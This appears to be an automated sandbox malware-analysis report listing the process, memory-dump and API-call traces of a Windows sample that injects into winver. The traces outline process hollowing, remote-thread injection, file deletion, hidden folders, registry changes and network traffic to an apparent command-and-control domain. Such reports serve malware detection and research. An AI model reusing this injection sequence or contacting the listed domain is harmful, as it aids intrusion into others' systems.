                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:43
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:44
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:45
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false


Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 11%
Total number of Nodes: 209
Total number of Limit Nodes: 7

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 23 401000-401009 24 40100c-401018 23->24 24->24 25 40101a-40102c 24->25 26 40102e-40103d 25->26 26->26 27 40103f-401043 26->27 27->26 28 401045-40106e VirtualAlloc call 401075 27->28 30 401073 28->30 30->30
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1651887371.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.1651867182.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: alAl
                                                                                                                                                                • API String ID: 4275171209-1316302345
                                                                                                                                                                • Opcode ID: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                • Instruction ID: 5af7c2372beb94d1e1b866602b7db5847228e6fe9b98f09dddad8bbdacf03bae
                                                                                                                                                                • Opcode Fuzzy Hash: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                • Instruction Fuzzy Hash: B1015A36A401618FD765CF18C841F41B3E1BF48325F1A81A5D989AB7A2C778FC92CB88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0223098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022309A5
                                                                                                                                                                  • Part of subcall function 0223098B: GetStartupInfoA.KERNEL32(00000000), ref: 022309BD
                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0223001D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 213680645-0
                                                                                                                                                                • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction ID: f5d3848e1ae131f9fcf9d9035ce1570d0bbbf106777df3fab9219c8c36f54095
                                                                                                                                                                • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction Fuzzy Hash: AA72E1E242E3C54FD7179BE04A64A667F78BF03208B0910CBD5819E0BFD6649B09C77A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652184347.0000000002040000.00000040.00001000.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2040000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                • API String ID: 544645111-3459585926
                                                                                                                                                                • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction ID: 9aa67840fe29e07c9ffd3953f7bcb7f2fd0f513a94b714468fd582a94542b6c4
                                                                                                                                                                • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction Fuzzy Hash: CF3277B4E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341DB756E85CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNELBASE(00000000,022309F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02230A04
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02230A2C
                                                                                                                                                                • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02230A57
                                                                                                                                                                • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02235834,00000000,00000000,00000002), ref: 02230A9C
                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02230ACA
                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02230ADA
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 02230AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02230B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1738979855-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: fe3856f926a676bf3fdc8fa0c0c37ff7a3f810f253ea3a9001e2f7d4e88482cc
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 463182716102159FEF279F50CC84BA977B9FF04748F0801D4AA49FE0E9DBB09A90CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 479 2233409-2233462 GetVolumeInformationA call 2233634
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(02233405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02233409
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                                • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction ID: 0bf4314625267529b0a732a6bd7afd8f3b14ba04a13767d9abb42c21b0816da5
                                                                                                                                                                • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction Fuzzy Hash: 46F0FE75500154DFEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA309595CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                • Instruction ID: d1ef321f61d42a0d3f06f77403b98c5b857d4a6aacff73942b2859739c0c2a16
                                                                                                                                                                • Opcode Fuzzy Hash: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                • Instruction Fuzzy Hash: 7DC1F7A54286878EE7178E98C0593D2BFD6BB12318F4893C9C19D4F2DBC36981E9C7D1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                • Instruction ID: 639b8e4c648f16845a7acfb299fea36a2729e31a94a3c932e9d459fd17e03abf
                                                                                                                                                                • Opcode Fuzzy Hash: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                • Instruction Fuzzy Hash: BBB12CA16387878AE7278A98C4153D2BF91BB12328F085389C5DD0F5EBC3B582D9C7D1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• LoadLibraryA.KERNEL32(02232949,00000008,?,00000000,02232835,00000000), ref: 02232956
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02232993
• lstrcat.KERNEL32(00000000,022329C1), ref: 022329D0
• lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
• lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
• String ID:
• API String ID: 675344582-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcat.KERNEL32(00000000,022329C1), ref: 022329D0
  • Part of subcall function 02232A01: lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
  • Part of subcall function 02232A01: lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
  • Part of subcall function 02232A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
  • Part of subcall function 02232A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
  • Part of subcall function 02232A38: lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
  • Part of subcall function 02232A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
  • Part of subcall function 02232A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
  • Part of subcall function 02232B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02232C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 0223320E
• GetStartupInfoA.KERNEL32(00000000), ref: 0223324C
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022331D9,00000011,?,00000000,00000000), ref: 02233279
• CloseHandle.KERNEL32(?,?,022331D9,00000011,?,00000000,00000000,00000000,02233092,00000004,00000000), ref: 02233285
• CloseHandle.KERNEL32(?,?,022331D9,00000011,?,00000000,00000000,00000000,02233092,00000004,00000000), ref: 02233291
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,02233F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02233F51
• Sleep.KERNEL32(000003E8,00000000,?,02233F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02233F6F
• Sleep.KERNEL32(000007D0), ref: 02233F7F
• Sleep.KERNEL32(00000BB8), ref: 02233F8F
Memory Dump Source
• Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2230000_java.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 75e63d1fb4268b9fcdae1f37588b8589bfe87843deeba15f63a909f21bc0a238
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: 93F01CB05683509EFB42BFF08C4C64A3AB9AF01704F4400D0AA89ED09ECF7482508EF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:19.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                Signature Coverage:4%
                                                                                                                                                                Total number of Nodes:619
                                                                                                                                                                Total number of Limit Nodes:11

Control-flow Graph

• Executed
• Not Executed
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
• send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
• recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
• closesocket.WS2_32(?), ref: 0339304A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: send$closesocketrecv
• String ID: gfnlmtcolrrb.pw
• API String ID: 3431254638-1614117810
• Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
• Instruction ID: bae06507475bace9515d3996c19dfaa7aee6746a7883948ba92cc304f5e060da
• Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
• Instruction Fuzzy Hash: 4E2162B6B00114ABFF119E28CC84B5A7BE9EF44654F054195FE0DEB254D639ED108BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
• WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
• CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 03390E70
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
• String ID:
• API String ID: 1718980022-0
• Opcode ID: 195885531eb125f92f9d64206e765e7730eee5440e80a1b8655d10872ba2d5a3
• Instruction ID: 82015f6d2885552f2f1f7e22f698f6822ba57af5d0037ba70fdad9777b95691c
• Opcode Fuzzy Hash: 195885531eb125f92f9d64206e765e7730eee5440e80a1b8655d10872ba2d5a3
• Instruction Fuzzy Hash: 62113D32500205FFFF219F25CC85F9A3BA9EF81B54F188051FE04BE1A9D770A521CAA8
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(03392925,00000008,?,00000000,03392811,00000000), ref: 03392932
                                                                                                                                                                  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
                                                                                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 03392957
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 0339296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,0339299D), ref: 033929AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
                                                                                                                                                                  • Part of subcall function 03392683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0339269E
                                                                                                                                                                  • Part of subcall function 03392683: GetFileSize.KERNEL32(?,00000000), ref: 033926B7
                                                                                                                                                                  • Part of subcall function 03392683: ReadFile.KERNELBASE(0339298A,?,00000000,?,00000000), ref: 033926DB
                                                                                                                                                                  • Part of subcall function 03392683: CloseHandle.KERNEL32(0339298A), ref: 033926EC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
                                                                                                                                                                • String ID: `nIu
                                                                                                                                                                • API String ID: 3655464437-1509933002
                                                                                                                                                                • Opcode ID: eb8990545cc0a5abdb3de08b12fefd3aa46b733b25a065b3f20c183e55480bf0
                                                                                                                                                                • Instruction ID: 402dff46f4b8a87c6ad29a4c83522d146d34bded25b34600d6dd5e66d92988ae
                                                                                                                                                                • Opcode Fuzzy Hash: eb8990545cc0a5abdb3de08b12fefd3aa46b733b25a065b3f20c183e55480bf0
                                                                                                                                                                • Instruction Fuzzy Hash: 3F513576800718FEEF22EB618DC4FAB77BCEF40705F054897AA45EA055DE709680CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000), ref: 0339065A
                                                                                                                                                                  • Part of subcall function 0339067C: LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
                                                                                                                                                                  • Part of subcall function 0339067C: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                  • Part of subcall function 0339067C: Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                  • Part of subcall function 0339067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                  • Part of subcall function 033926F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
                                                                                                                                                                  • Part of subcall function 033926F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
                                                                                                                                                                  • Part of subcall function 033926F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
                                                                                                                                                                  • Part of subcall function 033926F9: CloseHandle.KERNEL32(?), ref: 0339275F
                                                                                                                                                                  • Part of subcall function 03390811: RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
